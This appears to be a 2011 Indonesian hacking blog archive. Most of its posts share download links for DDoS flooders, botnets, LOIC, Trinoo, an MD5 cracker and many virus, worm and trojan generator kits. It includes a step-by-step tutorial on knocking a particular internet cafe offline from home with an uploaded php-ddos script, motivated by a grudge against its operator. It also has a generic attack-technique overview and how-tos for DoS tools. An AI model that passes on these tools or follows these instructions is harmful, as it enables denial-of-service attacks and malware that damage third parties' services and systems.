http://yoyoparty.com/upload/compiled_ddos2.tgz

regards
mywisdom
thanks:
devilzc0de crews and members. ycl crews and members, jasakom crews and members

Minggu, 29 Mei 2011

KUMPULAN DDOS V1

LANGSUNG DOWNLOAD TOOL DDOS NYA downlod soni download soni download packet flood soni download cflo2 soni download ping soni

UDPFLOOD.EXE

download udpflood soni source

SYN FLOOD dan Trinoo

download syn flood soni download trinoo soni download soni

TOOL ddos GOOD BYE

LANGSUNG DOWNLOAD download soni download soni

TOOL DDOS IPWN_V1.0 DAN TOOL GOOD_BYE_V3.0

LANGSUNG DOWNLOAD AJA MUDAH KOK MAKENYA download ipwn soni download good bye soni download virus chantiqs soni

Jumat, 27 Mei 2011

ddosping

LANGSUNG AJA DOWNLOAD   <a href:="http://4shared.com/file/7agr501g/ddosping.html">download soni</a>

Kamis, 26 Mei 2011

DDOS ATTACKING TOOL LOIC

ni langsung aja download download loic soni

DDOS PENDUKUNG WIKILEAKS

Instal dulu framework ni ,kalo belum ada www.microsoft.com/downloads/en/details.aspx?FamilyID=9cfb2d51-5ff4-4491-b0e5-b386f32c0992&displaylang=en kalo dah ini dia tool nya download soni

Rabu, 25 Mei 2011

DDoS.exe dan DDOS ATTACK .exe

LANGSUNG DOWNLOAD KEMARI download 4shared soni download 4 shared soni

DDOS ATTACK PING

LANGSUNG DOWNLOAD SAJA download ping attack soni

DDOS 5.0

LANGSUNG DOWNLOAD AJA download ddos soni

TOOL DDOS TERBAIK

LANGSUNG DOWNLOAD AJA TANPA BANYAK BICARA download soni janidoseng download soni download soni download soni

Selasa, 24 Mei 2011

MELIHAT PASWORD TERSIMPAN DI MOZILLA FIREFOX

Gak usah bacot lagi sesuai judul Masuk ke TOOLS>OPTIONS>pilih TAB SECURITY>klik SAVED PASWORDS>muncul kotak dialog yg tersimpan>klik SHOW PASWORDAS taraaaa pasword da bisa diliat cyber

Senin, 23 Mei 2011

10 top hacking tools

NI DIA 10 TOP HACKING TOOLS LANGSUNG DOWNLOAD liat sini

TOOL DDOS ATTACK PING DAN DANGEROUS FLOODERS

LANGSUNG DOWNLOAD AJA NIE. download soni DAN INI download soni

MD5 CRACKER

LANGSUNG AJA DOWNLOAD download soni

DDOS TOOL BOTNET PART 3

LANGSUNG AJA DI DOWNLOAD DAN SENANG SENANG MAKE SOFTWARE NIE. download botnet soni dan ini download soni

KUMPULAN TOOL DDOS PART 2

LANGSUNG DOWNLOAD AJA YA download soni download soni download soni download soni

Ddos ping of death

YG SUKA DDOS NI LANGSUNG AJA, download soni DAN INI download soni

Minggu, 22 Mei 2011

3000 jenis javascript

Ni gan 3000 jenis code javascript semoga berguna klik soni

Kumpulan tool ddos

Yg suka ddos ni sini soni soni sini sini soni

Sabtu, 21 Mei 2011

Megadeath v1.6

Langsung yg suka ddos sini soni

Download Pingflooder

Yg suka ddos langsung aja ,saya tidak bertanggung jawab atas apa yg terjadi www.all-shares.com/download/g2913055-ping-flooder.html

DOWNLOAD

1.)www.rs358.rapidshare.com/files/137151349/MEGADEATH.rar (ddos) 2.)www.all-shares.com/download/g2913055-ping-flooder (ddos) 3.)www.filestube.com/3iyK3430zb8yWxxHNzoL3/CrazyPing-v1-1.html 4.)www.dl4all.com/g66/tag/cmd+ping-3.html 5.)www.afficlever.blogspot.com/2008/03/advanced-stream-trojan-generator.html 6.)www.ziddu.com/download/8559731/netbus.zip.html 7.)www.artikel.ilmuti.com/2011/03/31/cara-ddos-attack-menggunakan-pingflood 8.)www.groups.google.com/group/jogjahacking/msg/828c0964e0205258?hl=pt&pli=1 9.)www.forum.cyber-freedomm.com/showthread.php?52-cara-ddos-attack-menggunakan-pingflood 10.)www.isohunt.com/torrent-details/153325717/?tab=summary. 11.)www.rstcenter.com/forum/17469-some-hacking-tools.rst 12.)www.hi.baidu.com/hkxdw/blog/item/f2efe4bd4c72c9o118d81fd3.html 13.)www.leetupload.com/dbindex2/index.php?dir=win32/ddos 14.)www.balicybertools.co.cc/2011/03/membuat-serangan-ddos.html 15.)www.download.pudn.com/downloads35/sourcecode/windows/network/897770122tfn2k.tar.g2 16.)www.brothersoft.com/downloads/ping-flood-tool-download.html 17.)www.downloadatoz.com/internet-directory/rapid-ping-flood 18.)www.hackingtriks.in/2011/05/free-download-dos-attacking-tool-loic.html

Jumat, 20 Mei 2011

Antivirus untuk hp/ponsel

Seperti halnya sebuah komputer, HP ber OS symbian sangat rentan sekali terserang oleh virus. Kemungkinan terkena virus akan semakin besar jika kamu sering bertukar file menggunakan bluetooth. Jika sudah terinfeksi, bukan tidak mungkin jalan terakhir untuk mengatasinya adalah menginstal ulang ke tempat servis. Tentunya disamping membutuhkan dana yang lumayan, hal itu juga cukup menjengkelkan bagi kamu. Apalagi jika ternyata data-data kamu kemudian tidak dapat terselamatkan. Lengkap sudah penderitaanmu :D v
Sebelum semua itu terjadi ada baiknya kamu mengantisipasinya dengan anti virus yang memang bisa menangkal semua virus yang mengancam. Namun, layaknya antivirus yang ada pada perangkat lain seperti PC, anti virus yang kamu gunakan tadi pun harus selalu terupdate. Percuma rasanya menggunakan anti virus jika kamu tidak mengupdatenya karena pastinya virus-virus baru pun bermunculan.

    Berikut ini adalah sepuluh aplikasi anti virus untuk hp kamu:
  1. Avira Anti-virus (download)
  2. avira-anti-virus1
  3. Bitdefender (download)
  4. bit-defender
  5. Bull guard Anti-virus (download)
  6. bull-guard
  7. F-secure anti-virus (download)
  8. f-seccure
  9. Kaspersky anti-virus (download)
  10. kaspersky
  11. Mcafee virus scan (download)
  12. mc-afee
  13. Norton Antivirus (download)
  14. norton-antivir4
  15. Panda Antivirus (download)
  16. panda-antivir
  17. Simworks Anti-virus (download)
  18. simsworks
  19. Trendmicro Mobile security (download)
  20. trend-micro
Tambahan
anticomwarrior
163_anticommwarrior_
Untuk ponsel tipe: Nokia 3230, 6260, 6600, 6630, 6670 ,6680 ,6681 ,6682, 7610, N70, N72, N90, Panasonic X700, Panasonic X800
Nokia 3250, 5500, E50, E60, E61, E62, E70, N71, N73, N80, N91, N92, N93.
Bisa didownload di sini.
Jika tak cukup puas dengan koleksi antivirus di atas, kamu bisa mendownload kurang lebih 75 jenis antivirus hp pada link berikut.

DOWNLOAD 75 ANTIVIRUS (RAPID SHARE)

KUMPULAN TOOL UNTUK MEMBUAT VIRUS,WORM DAN TROJAN


Berikut kumpulan tools untuk membuat virus, worm, trojan.

VBS Worm Generator


Download di sini (……….)

VCL32

Download di sini (………..)

VDX Batch Generator


Download di sini (………..)

Viral Matrix


Download di sini (………..)

Virus Construction Set

Download di sini (……….)

Virus Creation 2000

Download di sini (……….)

Virus Creation Lab

Download di sini (………)

Virus Development Kit

Download di sini (………)

Virus Factory mit Code – Tabelle

Download di sini (………)

A virus generator

Download di sini (………)

Virus Laboratory for DOS


Download di sini (……….)

The Virus Wizard

Download di sini (………)

Visual Basic Worm Generator


Download di sini (………)

The WalruS Macro Virus Engine

Download di sini (………)

Wavefunc’s Goofy Batch Virus Generator v1.1c

Download di sini (………)

WG Batch n’ Script


Download di sini (………)

Windows Scripting Host Worm Constructor

Download di sini (………)

Windows Virus Creation Kit

Download di sini (………)

WMF Maker

Download di sini (………)

Wonesek VBS Joiner

Download di sini (………)

Word97 Macro Virii Construction Kit

Download di sini (………)

Worm IRC Script Kit


Download di sini (………)

XVGL


Download di sini (……….)

$MOOTHiE::s Macro Virus Creator 2000


Download di sini (………)

Access Macro Generator


Download di sini (……….)

Acid Flowing Trojan Generator


Download di sini (……….)

Advanced Steam Trojan Generator


Download di sini (……….)

Alchemic Life Generator


Download di sini (………)

Apokalipses


Download di sini (……….)

BAT Poly Generator


Download di sini (………)

Batch Encrypt


Download di sini (………)

Bio Hazard Worm Generator


Download di sini (………)

C++ Worm Generator


Download di sini (………)

Sumber 

Tag : tools, virus, worm, trojan, generator, tools, virus, worm, trojan, generator, tools, virus, worm, trojan, generator, tools, virus, worm, trojan, generator, tools, virus, worm, trojan, generator, tools, virus, worm, trojan, generator, tools, virus, worm, trojan, generator, tools, virus, worm, trojan, generator, tools, virus, worm, trojan, generator, tools, virus, worm, trojan, generator, tools, virus, worm, trojan, generator, tools, virus, worm, trojan, generator, tools, virus, worm, trojan, generator, tools, virus, worm, trojan, generator, tools, virus, worm, trojan, generator, tools, virus, worm, trojan, generator, tools, virus, worm, trojan, generator,

Cara Mematikan Koneksi Warnet Lewat Internet Rumah

Berawal dari cerita seorang member yang kesel banget sama operator warnet deket rumahnya, operatornya songong sok pinter pokoknya belagu deh orang nya. Dia pernah maen di warnet udah gitu kena tipu sama permainan biling-nya. Masa iyak baru maen sebentar udah mahal bayarnya, abis itu lemot lagi koneksi nya

Mangkanya dia termotivasi untuk mematikan koneksi internet warnet itu, lewat koneksi internet rumah dia tapi gak tau cara nya gimana...


cekidot..bekicot ampe kejedot...

Pertama anda pergi ke warnet 'target'

Browsing ke http://ijoo.indosecure.net/ip.php

Anda akan dapet IP Publik dari Warnet tersebut...

Jangan keluar dulu dari warnet... rugi lah mending cukupin aja 1 jam
selama itu kita bisa register di website hosting gratisan (yg support php)
xuiuixxuiuix..

terus.. masukin script ini
img
Download :
http://www.ziddu.com/download/14603029/php-ddos.zip.html

Sekarang tinggal ingat aja tuh website & ip public warnet..
Setelah itu tinggal buka di rumah website2 yang telah anda masukin script php-ddos tadi

Udah... tinggal dibantai... :Tongue:

Untuk mengetahui port-nya berapa... coba PHP Port Scanner
img
Silahkan download di sini :
http://www.ziddu.com/download/14604067/PHPort.zip.html

Happy DDOS...

Referensi,
http://forum.binushacker.net/web-programming/php-port-scanner/
http://forum.binushacker.net/hacking/gimana-yah-cara-mematikan-koneksi-warnet-lewat-internet-rumah

Rabu, 18 Mei 2011

cara hacker merusak,masuk,membobol website


cara hacker merusak,masuk,membobol website

i
Quantcast
Cara cara seoarang hacker menembus ataupun menyusup dan juga merusak
suatu website adalah sebagai berikut.Teknik teknik itu antara lain:
1. IP Spoofing
2. FTP Attack
3. Unix Finger Exploits
4. Flooding & Broadcasting
5. Fragmented Packet Attacks
6. E-mail Exploits
7. DNS and BIND Vulnerabilities
8. Password Attacks
9.Proxy Server Attacks
10. Remote Command Processing Attacks
11. Remote File System Attack
12. Selective Program Insertions
13. Port Scanning
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
15. HTTPD Attacks
1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu
pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP
attacker adalah alamat IP dari host di dalam network bukan dari luar
network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx
ketika attacker melakukan serangan jenis ini maka Network yang diserang
akan menganggap IP attacker adalah bagian dari Networknya misal
192.xx.xx.xx yaitu IP type C.
IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet
routing untuk mengubah arah dari data atau transmisi ke tujuan yang
berbeda. Packet untuk routing biasanya di transmisikan secara transparan
dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi
asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh
attacker tetapi juga dipakai oleh para security profesional untuk men
tracing identitas dari para attacker.
2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol
adalah serangan buffer overflow yang diakibatkan oleh malformed command.
tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan
command shell ataupun untuk melakukan Denial Of Service. Serangan Denial
Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk
mengambil resource didalam network tanpa adanya autorisasi, sedangkan
command shell dapat membuat seorang attacker mendapatkan akses ke sistem
server dan file-file data yang akhirnya seorang attacker bisa membuat
anonymous root-acces yang mempunyai hak penuh terhadap system bahkan
network yang diserang.
Tidak pernah atau jarang mengupdate versi server dan mempatchnya
adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah
yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh
adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang
selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang
mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna
untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack
(menggunakan server ftp orang lain untuk melakukan serangan), dan
mengetahui atau mensniff informasi yang berada dalam sistem.
3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara
efficient untuk men sharing informasi diantara pengguna. Karena
permintaan informasi terhadap informasi finger ini tidak menyalahkan
peraturan, kebanyakan system Administrator meninggalkan utility ini
(finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama
sekali. Bagi seorang attacker utility ini sangat berharga untuk
melakukan informasi tentang footprinting, termasuk nama login dan
informasi contact.
Utility ini juga menyediakan keterangan yang sangat baik tentang
aktivitas user didalam sistem, berapa lama user berada dalam sistem dan
seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger
ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem.
Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini
sudah cukup bagi seorang atacker untuk melakukan social engineering
dengan menggunakan social skillnya untuk memanfaatkan user agar
‘memberitahu’ password dan kode akses terhadap system.
4. Flooding & Broadcasting
Seorang attacker bisa menguarangi kecepatan network dan host-host
yang berada di dalamnya secara significant dengan cara terus melakukan
request/permintaan terhadap suatu informasi dari sever yang bisa
menangani serangan classic Denial Of Service(Dos), mengirim request ke
satu port secara berlebihan dinamakan flooding, kadang hal ini juga
disebut spraying. Ketika permintaan flood ini dikirim ke semua station
yang berada dalam network serangan ini dinamakn broadcasting. Tujuan
dari kedua serangan ini adalah sama yaitu membuat network resource yang
menyediakan informasi menjadi lemah dan akhirnya menyerah.
Serangan dengan cara Flooding bergantung kepada dua faktor yaitu:
ukuran dan/atau volume (size and/or volume). Seorang attacker dapat
menyebabkan Denial Of Service dengan cara melempar file berkapasitas
besar atau volume yang besar dari paket yang kecil kepada sebuah system.
Dalam keadaan seperti itu network server akan menghadapi kemacetan:
terlalu banyak informasi yang diminta dan tidak cukup power untuk
mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan
kapasitas proses yang besar pula, tetapi secara tidak normal paket yang
kecil dan sama dalam volume yang besar akan menghabiskan resource
secara percuma, dan mengakibatkan kemacetan.
5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi
lagi ke dalam paket-paket yang hanya mengandung paket pertama yang
isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa
firewall akan mengizinkan untuk memroses bagian dari paket-paket yang
tidak mengandung informasi alamat asal pada paket pertamanya, hal ini
akan mengakibatkan beberapa type system menjadi crash. Contohnya, server
NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet)
cukup untuk menulis ulang informasi paket pertama dari suatu protokol.
6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail
floods, manipulasi perintah (command manipulation), serangan tingkat
transportasi(transport level attack), memasukkan berbagai macam kode
(malicious code inserting) dan social engineering(memanfaatkan
sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi
crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi
atau juga membuat akses ke fungsi fungsi perintah (command function).
7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang
aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi
mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis
yang diarahkan pada operasi dasar dari Internet (basic internet
operation).
8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang
kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka
miliki, seperti bertransaksi online di warnet, bahkan bertransaksi
online dirumah pun sangat berbahaya jika tidak dilengkapi dengan
software security seperti SSL dan PGP. Password adalah salah satu
prosedur kemanan yang sangat sulit untuk diserang, seorang attacker
mungkin saja mempunyai banyak tools (secara teknik maupun dalam
kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh
password.
Ketika seorang attacker berhasil mendapatkan password yang dimiliki
oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan
user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga
passwordnya dari social engineering setidaknya dapat meminimalisir
risiko, selain berjaga-jaga dari praktek social enginering organisasi
pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan
yang dilakukan terhadap password adalah menebak (guessing), brute force,
cracking dan sniffing.
9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu
response dengan cara menyatukan proses dari beberapa host dalam suatu
trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan
untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya
lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda
dan sebaliknya.
10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host menyediakan fasilitas
pertukaran informasi dan resource sharing. Sama halnya dengan proxy
server, trusted relationship memberikan kepada semua anggota network
kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted
system. Sama seperti kerawanan pada proxy server, ketika akses diterima,
seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan
mengkases data yang tersedia bagi user lainnya.
11. Remote File System Attack
Protocol-protokol untuk tranportasi data –tulang punggung dari
internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan
mekanisme untuk baca/tulis (read/write) Antara network dan host.
Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme
ini untuk mendapatkan akses ke direktori file.
12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika
attacker menaruh program-program penghancur, seperti virus, worm dan
trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system
sasaran. Program-program penghancur ini sering juga disebut malware.
Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan
file, pencurian password sampai dengan membuka backdoor.
13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara
bertahan sebuah system dari berbagai macam port. Seorang atacker bisa
mendapatkan akses kedalam sistem melalui port yang tidak dilindungi.
Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default
SNMP string di buka untuk publik, yang artinya informasi bisa di extract
untuk digunakan dalam remote command attack.
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception TCP/IP Sequence Stealing, Passive Port Listening dan
Packet Interception berjalan untuk mengumpulkan informasi yang sensitif
untuk mengkases network. Tidak seperti serangan aktif maupun
brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak
kualitas stealth-like.
15. HTTPD Attacks
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam:
buffer overflows, httpd bypasses, cross scripting, web code
vulnerabilities, dan URL floods.
HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors
pada port yang digunakan untuk web traffic dengan cara memasukan banyak
carackter dan string untuk menemukan tempat overflow yang sesuai.
Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan
string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow
dapat memberikan attacker akses ke command prompt.
CARA dan TEKNIK Hacker Menembus (Attacking) Situs atau Webserver, 2008, http://www.colonel.web.id, Computer Networking Security

DOS attack goodbye v3

Permisi agan agan sekalian... ane cmu n mw share atau berbagi ilmu aj.... hehehe.. kalo bisa di rate juga yah... hehehe

Sebelumnya ane cmn mw nerangin dlu pengertian ttg DDoS atau Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut. Serangan Denial of Service (DOS) ini terjadi apabila penyerang atau yang sering terdengar dengan istilah hacker ini merusak host atau sevice yang ada sehingga host atau service itu tidak dapat lagi berkomunikasi secara lancar di dalam network neighborhood-nya . Perkembangan dari serangan DOS adalah DDOS. Serangan DDoS adalah jenis serangan dengan cara memenuhi trafik server situs tersebut hingga situs menjadi lambat dan susah diakses. Pengertian lain tentang DDOS adalah mengirimkan data secara terus menerus dengan menggunakan satu komputer tidak begitu efektif karena biasanya sumber daya server yang diserang lebih besar dari komputer penyerang.

oke aplikasi yang ane mw share dsini yaitu aplikasi good Bye v3 yang khusus di rancang buat DDoS ke Website2...



Ni dia screenshut aplikasinya... agan agan tinggal masukin aja website yang di jadiin target buat belajar...set portnya trus kemudian klik tombol start setelah itu liat website yang di jadiin target...bisa di akses apa ngga...kalo ga bisa atau network timeout artinya DoS sukses kalo masih bisa di akses ya cr target lain aja... but targetx jgn web web indox yaaa...kasiannn negara sendiri...


Video tutorialnya silahkan agan liat disni

http://search.4shared.com/q/1/goodbye%20v3                 http://torrentz.eu/88815c6aa5b30b992b0068c9ca53d120f8ee5401 

hehehe.... ni cmn buat share aj n buat belajar juga.... hehehehe... jadi kalo ada apa2 ya resiko tanggung sendiri ... http://rapidshare.com/files/395812810/iPwn_v1.0_blog.devilwebz.co.cc.zip.html
Cara penggunanya juga sangat simple dan mudah, hanya memasukan url or ip victim
b